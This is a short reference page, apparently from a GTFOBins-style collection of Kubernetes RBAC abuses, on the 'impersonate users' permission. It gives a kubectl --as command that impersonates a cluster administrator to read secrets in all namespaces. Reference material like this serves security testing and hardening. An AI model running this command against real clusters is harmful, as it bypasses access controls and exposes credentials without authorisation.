can-i gtfo?

Kubernetes RBAC Abuse Collection

View on GitHub

impersonate users

Verb: impersonate

Resource: users

Description: Impersonate other users in the Kubernetes cluster

Abuses

Privilege Escalation

Assume the identity of privileged users to bypass access controls

# Impersonate cluster administrator
kubectl --as={admin-user} get secrets --all-namespaces
← Back to overview